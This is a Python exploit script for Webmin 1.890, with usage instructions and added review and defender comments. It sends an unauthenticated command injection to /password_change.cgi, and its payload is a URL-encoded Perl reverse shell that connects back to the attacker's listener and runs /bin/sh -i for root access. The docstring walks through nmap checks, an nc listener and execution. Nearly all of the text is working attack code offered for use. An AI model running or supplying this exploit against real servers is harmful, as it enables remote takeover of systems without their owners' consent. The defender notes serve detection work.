#!/usr/bin/env python3
"""
This python script should give you a root shell on Webmin 1.890
Check with nmap:
nmap -sC -sV -p 10000 TARGET_IP
Result:
10000/tcp open http MiniServ 1.890 (Webmin httpd)
How to use this exploit:
Step 1:
nc -lnvp LPORT
Step 2:
chmod +x exploit.py
./exploit RHOST RPORT LHOST LPORT
RHOST = the target
RPORT = the target port (usually 10000)
LHOST = your kali box
LPORT = your reverse shell port
Step 3:
Get a root shell!
DO NOT HARM UNAUTHORIZED SYSTEMS!!!
"""
import requests
import urllib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence the InsecureRequestWarning that urllib3 emits for every HTTPS request
# made with verify=False; webminExploit below sends all of its requests that way,
# so certificate validation is off and nothing on the console will say so.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def webminExploit(rhost: str, rport: str, lhost: str, lport: str) -> None:
    """Send the three requests this proof of concept uses against a Webmin host.

    The function issues one GET to ``https://rhost:rport`` and then two POSTs
    to ``/password_change.cgi``. Both POSTs put a shell command in the
    ``expired`` form field: the first a fixed ``echo`` marker, the second a
    URL-encoded Perl one-liner that connects back to a listener and runs
    ``/bin/sh -i``. The module docstring names Webmin 1.890 as the affected
    release.

    Args:
        rhost: Host name or address of the Webmin service; concatenated into
            the URL as-is.
        rport: Port of the Webmin service. Must already be a ``str`` because
            it is concatenated, not formatted.
        lhost: Accepted but never read. The payload is built from the
            module-level ``LHOST`` instead.
        lport: Accepted but never read. The payload is built from the
            module-level ``LPORT`` instead.

    Returns:
        None. No response is inspected, so the function gives no indication
        of whether the target was reachable or affected.

    Defender notes (all taken from the requests built below):
        * Unauthenticated POSTs to ``/password_change.cgi`` whose ``expired``
          value is a command rather than a flag are the request-side
          indicator for web and proxy logs.
        * The first POST carries the constant marker ``QosaAPO6jTr`` in
          ``expired``, ``new1``, ``new2`` and ``old``.
        * The second POST is followed by an outbound TCP connection from the
          Webmin host, which egress filtering on management hosts would block
          or surface.
        * Moving off the affected release and keeping the Webmin port
          unreachable from untrusted networks addresses the exposure itself.
    """
    url = "https://" + rhost + ":" + rport
    print(url)
    print("[!] Checking target https://{}:{}".format(rhost, rport))
    # verify=False turns off TLS certificate validation for every request here.
    # NOTE(review): no timeout is passed, so an unresponsive host blocks the
    # call indefinitely, and `r` is never read (no status or banner check).
    r = requests.get(url, verify=False)
    headers = {}
    # Referer is set to the target's own base URL.
    # presumably to pass a same-site referer check in Webmin; confirm.
    headers['Referer'] = str(url+"/")
    # Printed unconditionally; it does not reflect the result of the GET above.
    print("[+] Sending the exploit!")
    # First POST: harmless `echo <marker>` in the `expired` and `old` fields.
    # The response (r2) is overwritten below without being examined.
    r2 = requests.post(url + "/password_change.cgi",headers=headers, verify=False, data="expired=echo%20QosaAPO6jTr&new1=QosaAPO6jTr&new2=QosaAPO6jTr&old=echo%20QosaAPO6jTr")
    # URL-encoded Perl reverse-shell one-liner.
    # NOTE(review): this reads the module globals LHOST/LPORT rather than the
    # lhost/lport parameters, so the function raises NameError unless the
    # script's top-level assignments have already run.
    shellie = "perl%20-e%20%27use%20Socket%3B%24i%3D%22"+LHOST+"%22%3B%24p%3D"+LPORT+"%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22/bin/sh%20-i%22%29%3B%7D%3B%27"
    # Second POST: the same endpoint and header, with the one-liner as `expired`.
    r2 = requests.post(url + "/password_change.cgi",headers=headers, verify=False, data="expired="+shellie)
# Positional arguments, in order: RHOST RPORT LHOST LPORT (see the module
# docstring). There is no argument-count check, so a missing argument ends the
# script with an IndexError. These run at import time as well as on execution.
# The names LHOST and LPORT must stay module-level: webminExploit's payload
# line reads them directly instead of using its own parameters.
RHOST, LHOST = sys.argv[1], sys.argv[3]
RPORT, LPORT = str(sys.argv[2]), str(sys.argv[4])
webminExploit(RHOST, RPORT, LHOST, LPORT)